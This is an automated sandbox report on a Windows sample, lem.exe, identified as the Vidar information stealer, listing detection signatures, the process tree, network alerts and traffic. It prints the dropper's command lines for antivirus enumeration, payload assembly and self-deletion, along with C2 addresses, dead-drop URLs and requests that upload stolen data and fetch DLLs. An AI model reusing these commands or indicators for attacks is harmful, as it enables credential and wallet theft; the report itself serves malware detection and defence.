Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
lem.exe

Overview

General Information

Sample name:lem.exe
Analysis ID:1488222
MD5:bb74165a5eb382a47e26f4efd8c2f151
SHA1:cb6f613025a9b8cf64bd90ae3813beb4e872e93f
SHA256:d3b3da570c489317ccaa129c2c66cc8765afaf20b5e4ccc24a88dd6b90e64920
Tags:exe
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Found stalling execution ending in API Sleep call
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • lem.exe (PID: 5344 cmdline: "C:\Users\user\Desktop\lem.exe" MD5: BB74165A5EB382A47E26F4EFD8C2F151)
    • cmd.exe (PID: 5348 cmdline: "C:\Windows\System32\cmd.exe" /k move Uniform Uniform.cmd & Uniform.cmd & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 2616 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6768 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 6204 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 4456 cmdline: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 1408 cmdline: cmd /c md 366791 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 6760 cmdline: findstr /V "TrailersTractOffersVenezuela" Mines MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 6768 cmdline: cmd /c copy /b Pending + Smith + Specifications + Resident 366791\M MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Gift.pif (PID: 748 cmdline: 366791\Gift.pif 366791\M MD5: 6EE7DDEBFF0A2B78C7AC30F6E00D1D11)
        • cmd.exe (PID: 3568 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\366791\Gift.pif" & rd /s /q "C:\ProgramData\CBKJJJDHDGDA" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 3500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 2124 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 6204 cmdline: timeout 5 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": "http://www.microsoft.com0", "Botnet": "1402"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000B.00000003.2544771101.000000000465B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      0000000B.00000002.3217998328.00000000046E1000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        0000000B.00000003.2544847220.0000000001676000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          0000000B.00000002.3217806128.0000000004688000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            0000000B.00000002.3217998328.000000000484E000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              Click to see the 14 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              11.3.Gift.pif.4688da0.11.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                11.2.Gift.pif.1722008.2.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  11.3.Gift.pif.16a2810.8.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                    11.2.Gift.pif.465b598.4.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                      11.3.Gift.pif.465b598.9.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                        Click to see the 9 entries

                        Sigma Signatures

                        Sigma detected: Execution of Suspicious File Type Extension
                        Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: 366791\Gift.pif 366791\M, CommandLine: 366791\Gift.pif 366791\M, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\366791\Gift.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\366791\Gift.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\366791\Gift.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Uniform Uniform.cmd & Uniform.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5348, ParentProcessName: cmd.exe, ProcessCommandLine: 366791\Gift.pif 366791\M, ProcessId: 748, ProcessName: Gift.pif

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Sigma detected: Search for Antivirus process
                        Source: Process startedAuthor: Joe Security: Data: Command: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , CommandLine: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Uniform Uniform.cmd & Uniform.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5348, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , ProcessId: 4456, ProcessName: findstr.exe

                        Snort Signatures

                        Suricata Signatures

                        Timestamp:2024-08-05T18:55:53.040452+0200
                        SID:2028765
                        Source Port:49715
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-08-05T18:56:37.229200+0200
                        SID:2028765
                        Source Port:49737
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-08-05T18:55:56.073425+0200
                        SID:2028765
                        Source Port:49717
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-08-05T18:56:09.165224+0200
                        SID:2028765
                        Source Port:49725
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-08-05T18:56:48.655006+0200
                        SID:2028765
                        Source Port:49748
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-08-05T18:55:51.591528+0200
                        SID:2028765
                        Source Port:49713
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-08-05T18:56:51.563057+0200
                        SID:2028765
                        Source Port:49750
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-08-05T18:55:56.753779+0200
                        SID:2049087
                        Source Port:49717
                        Destination Port:443
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-05T18:56:53.756676+0200
                        SID:2054495
                        Source Port:49752
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-05T18:56:42.427737+0200
                        SID:2028765
                        Source Port:49742
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-08-05T18:56:35.159350+0200
                        SID:2028765
                        Source Port:49735
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-08-05T18:56:04.615928+0200
                        SID:2028765
                        Source Port:49722
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-08-05T18:56:44.328736+0200
                        SID:2028765
                        Source Port:49744
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-08-05T18:55:59.114134+0200
                        SID:2028765
                        Source Port:49719
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-08-05T18:56:47.466732+0200
                        SID:2028765
                        Source Port:49747
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-08-05T18:55:54.663227+0200
                        SID:2028765
                        Source Port:49716
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-08-05T18:56:22.171975+0200
                        SID:2028765
                        Source Port:49732
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-08-05T18:56:26.168708+0200
                        SID:2028765
                        Source Port:49734
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-08-05T18:56:39.235253+0200
                        SID:2028765
                        Source Port:49739
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-08-05T18:56:19.713700+0200
                        SID:2028765
                        Source Port:49730
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-08-05T18:56:46.372825+0200
                        SID:2028765
                        Source Port:49746
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-08-05T18:56:52.926886+0200
                        SID:2028765
                        Source Port:49751
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-08-05T18:56:38.198914+0200
                        SID:2028765
                        Source Port:49738
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-08-05T18:55:58.307206+0200
                        SID:2051831
                        Source Port:443
                        Destination Port:49718
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-05T18:56:13.087106+0200
                        SID:2028765
                        Source Port:49727
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-08-05T18:56:11.170074+0200
                        SID:2028765
                        Source Port:49726
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-08-05T18:56:36.234067+0200
                        SID:2028765
                        Source Port:49736
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-08-05T18:55:55.352655+0200
                        SID:2049087
                        Source Port:49716
                        Destination Port:443
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-05T18:56:40.332124+0200
                        SID:2028765
                        Source Port:49740
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-08-05T18:56:43.444404+0200
                        SID:2028765
                        Source Port:49743
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-08-05T18:55:57.620373+0200
                        SID:2028765
                        Source Port:49718
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-08-05T18:56:05.840854+0200
                        SID:2028765
                        Source Port:49723
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-08-05T18:56:41.322529+0200
                        SID:2028765
                        Source Port:49741
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-08-05T18:56:03.317760+0200
                        SID:2028765
                        Source Port:49721
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-08-05T18:56:20.793047+0200
                        SID:2028765
                        Source Port:49731
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-08-05T18:56:23.785268+0200
                        SID:2028765
                        Source Port:49733
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-08-05T18:56:07.183514+0200
                        SID:2028765
                        Source Port:49724
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-08-05T18:55:56.754342+0200
                        SID:2044247
                        Source Port:443
                        Destination Port:49717
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-05T18:56:45.398883+0200
                        SID:2028765
                        Source Port:49745
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-08-05T18:56:14.802464+0200
                        SID:2028765
                        Source Port:49728
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-08-05T18:56:16.411777+0200
                        SID:2028765
                        Source Port:49729
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-08-05T18:56:49.549343+0200
                        SID:2028765
                        Source Port:49749
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-08-05T18:56:00.308967+0200
                        SID:2028765
                        Source Port:49720
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus detection for URL or domain
                        Source: https://steamcommunity.com/profiles/76561199747278259/badgesAvira URL Cloud: Label: malware
                        Source: https://t.me/armad2aAvira URL Cloud: Label: malware
                        Source: https://steamcommunity.com/profiles/76561199747278259Avira URL Cloud: Label: malware
                        Source: https://steamcommunity.com/profiles/76561199747278259/inventory/Avira URL Cloud: Label: malware
                        Found malware configuration
                        Source: 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": "http://www.microsoft.com0", "Botnet": "1402"}
                        Multi AV Scanner detection for submitted file
                        Source: lem.exeReversingLabs: Detection: 55%
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.2% probability
                        Source: lem.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: unknownHTTPS traffic detected: 104.102.49.249:443 -> 192.168.2.5:49712 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 188.245.87.202:443 -> 192.168.2.5:49713 version: TLS 1.2
                        Source: lem.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: mozglue.pdbP source: Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3250430219.000000006C38D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.11.dr
                        Source: Binary string: freebl3.pdb source: Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.11.dr
                        Source: Binary string: freebl3.pdbp source: Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.11.dr
                        Source: Binary string: nss3.pdb@ source: Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3251010993.000000006C54F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.11.dr
                        Source: Binary string: cryptosetup.pdbGCTL source: Gift.pif, 0000000B.00000002.3221967002.000000000BEEF000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226364575.000000001295A000.00000004.00000800.00020000.00000000.sdmp, GDAAKK.11.dr
                        Source: Binary string: cryptosetup.pdb source: Gift.pif, 0000000B.00000002.3221967002.000000000BEEF000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226364575.000000001295A000.00000004.00000800.00020000.00000000.sdmp, GDAAKK.11.dr
                        Source: Binary string: softokn3.pdb@ source: Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Gift.pif, 0000000B.00000002.3238395117.000000002B17C000.00000004.00000800.00020000.00000000.sdmp, vcruntime140.dll.11.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: Gift.pif, 0000000B.00000002.3232561588.000000001F29A000.00000004.00000800.00020000.00000000.sdmp, msvcp140.dll.11.dr
                        Source: Binary string: nss3.pdb source: Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3251010993.000000006C54F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.11.dr
                        Source: Binary string: mozglue.pdb source: Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3250430219.000000006C38D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.11.dr
                        Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: Gift.pif, 0000000B.00000002.3222647934.000000000C208000.00000002.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3222989934.000000000C64A000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: softokn3.pdb source: Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr
                        Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
                        Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
                        Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_00334005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00334005
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_0033494A GetFileAttributesW,FindFirstFileW,FindClose,11_2_0033494A
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_0033C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_0033C2FF
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_0033CD14 FindFirstFileW,FindClose,11_2_0033CD14
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_0033CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_0033CD9F
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_0033F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0033F5D8
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_0033F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0033F735
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_0033FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_0033FA36
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_00333CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00333CE2
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior

                        Networking

                        barindex
                        C2 URLs / IPs found in malware configuration
                        Source: Malware configuration extractorURLs: http://www.microsoft.com0
                        Source: global trafficHTTP traffic detected: GET /profiles/76561199747278259 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                        Source: Joe Sandbox ViewIP Address: 104.102.49.249 104.102.49.249
                        Source: Joe Sandbox ViewIP Address: 38.180.132.96 38.180.132.96
                        Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIEBAFCBKFIDGCAKKKFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDGIIEBFCBAAAAKKEGHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHJEHJJDAAAKEBGCFCAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKEHIIJJECFHJKECFHDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCFHJDBKJKEBFHJEHIIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 6425Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FHIEBKKFHIEGCAKECGHJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJEHJJKJEGHJJKEBFBGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDGDGIIDGCFIDHDHDHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Connection: Keep-AliveCache-Control: no-cache
